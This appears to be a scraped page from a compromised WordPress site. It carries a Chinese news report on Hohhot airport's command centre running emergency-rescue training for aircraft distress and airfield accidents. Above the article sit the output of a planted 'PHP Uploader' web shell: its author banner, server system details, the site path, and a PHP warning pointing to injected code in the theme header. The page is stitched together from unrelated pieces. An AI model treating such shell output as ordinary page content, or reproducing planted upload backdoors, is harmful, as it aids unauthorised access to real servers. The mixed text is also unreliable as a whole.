PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

为进一步巩固和掌握航空器空中遇险以及航空器场内失事应急救援总体预案,提高运行指挥员对航空器应急救援处置能力,6月9日,呼和浩特机场运行指挥中心组织运行指挥员开展了航空器空中遇险以及航空器场内失事应急救援培训。  

培训师从应急救援信息传递、航空器空中遇险处置、集结待命指令发布三个方面展开,重点讲解了航空器空中遇险事件的信息传递原则、现场决策与处置、相关应急救援单位处置流程与职责等内容。同时,培训师分享了5月份机场公司组织的应急救援沙盘演练相关内容,运行指挥员结合指挥中心实际工作情况,对航空器空中遇险应急救援处置预案的启动、信息传递、事件处置方面进行了交流和讨论。 

航空器空中遇险与场内失事应急救援处置预案是呼和浩特机场应急救援手册中的重点内容。通过此次培训,运行指挥员对航空器应急救援处置有了更深入的认识和掌握,进一步巩固了应急处置预案的内容,提高了安全意识,为运行指挥员在今后处置航空器应急救援事件打下了良好基础。 

供稿:呼和浩特机场运行指挥中心,通讯员:胡波 报道

作者 一潼

发表回复